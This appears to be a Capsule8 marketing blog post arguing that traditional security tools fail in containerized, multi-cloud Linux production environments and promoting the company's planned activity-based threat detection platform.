Microservices and the increasing popularity of service-based architecture have catapulted Linux from the coder’s tinker toy of yesterday to the most popular platform on the planet today. It’s no wonder that modern Linux is fast becoming the defacto operating system of production environments and powering the “software is eating the world” phenomenon. It’s simple and open for easy integration and has become extremely stable in its modern state. Perhaps most importantly, open source enables the quick and easy deployment of multiple platforms across multiple clouds to serve multiple business channels. In fact, users can go from a mobile device to the cloud without ever touching any physical infrastructure within their own environment.
Meanwhile, container technology is further accelerating this drive, as DevOps push their standard data formats to the cloud. Container technology enables instant scalability and improves collaboration between development and operations teams. This next generation platform approach enables developers to build, host, store and deploy applications or websites on a highly scalable production infrastructure for web, mobile and backend solutions. Of course, this makes securing the production environment more critical than ever.
The New Cyber Security Gotcha
But as with most good things, there’s a catch. While the simple plug-and-play nature of next-generation infrastructure and modern production environments ensures that no one is left behind in the age of microservices, security in this brave new world just might be the fly in the ointment. This modular approach to delivery and infrastructure, which spans multiple clouds across various modern production environments, brings with it borderless networks as well as a different set of risks and vulnerabilities than those associated with more traditional approaches.
Current Solutions Fail in Modern Production Environments
The overarching problem is that too many cyber practitioners are applying five-year-old security models to this newly evolving and transformative technology. There are three main reasons existing tools are inadequate in modern settings:
- Traditional security relies on using a unique IP address as a stable and unique identifier for each asset it’s charged with protecting. But, many short-lived containers share a single IP address, so the appliance can’t identify assets.
- Traffic between containers on the same host never touches the network, thereby removing a vital source of detection data.
- End-to-end encryption is becoming more prevalent and soon (with TLS 1.3) today’s appliances won’t be able to intercept encrypted out-of-band traffic.
Further, in the world of Windows, the easiest way for a hacker to persist is by leaving behind malicious executables, which is where most Windows security focuses. In the Linux world, executables are far less portable with vastly less predictable runtime environments. Such executables generally get compiled on each system on which they run. In Linux, there are so many small useful and universal tools that a hacker doesn’t need to leave much behind – often just shell scripts. So, the old approach of detecting bad executables no longer suffices.
The current technological shift toward modern production environments and cloud-based infrastructure brings unprecedented opportunity, but also raises new questions that every organization must answer about their current and future security practices. For example, where does an appliance fit in? Do we really want a heavyweight virtual appliance that might cause new bottlenecks? How much more would it cost to split off traffic for an out-of-band appliance in the cloud? And if appliances provide less visibility, does that mean more clean-up costs?
A New Approach Is Critical
Capsule8 is developing the first threat prevention and response platform that’s purpose-built for cloud-native infrastructures. Our approach is to protect an organization’s assets across networks, systems, containers, bare metal, and clouds by addressing the diverse and complex nature of modern next-gen platform architecture and mircoservices. We believe the best approach is to look beyond traditional detection methods and instead focus on activity. By detecting the effect of an intrusion, security operations teams will be freed of the burden of monitoring for signatures or intrusions themselves and instead be able to focus on detecting and shutting down attacks in the instant they happen.
This pathway will provide real-time, container-aware visibility, and prevention across clusters. By focusing on the impact, Capsule8 will also provide automated attack resilience via real-time forensics and recovery, so that any piece of code that comes under attack in a stateless workload can be instantly frozen and replaced. With an API-first approach, Capsule8 is developing a single distributed engine for all rules and analysis that is open, flexible, extensible, and extremely simple to integrate.
Empowering the Digital Transformation
While these features are impressive and critical to navigating the modern Linux production environment in a safe manner, they would be of little use without automation. Capsule8 is working to enable “self-driving defense.” Just like self-driving cars manage the boring parts of driving, while you relax, Capsule8’s solution will elastically scale to your environment and team – just like containers – while eliminating alert fatigue and managing the easy parts of the drive on its own. This will enable security analysts to focus on the unknown twisty mountain roads rather than trance-inducing stretches of well-travelled highway.
Until now, such production security has been a pipedream – only available to major players like Facebook and Google, who have the resources to build their own security into their own production environments and deploy it as they see fit. Capsule8 will bring a level-playing field to bear by offering full production environment security to any organization looking to modernize.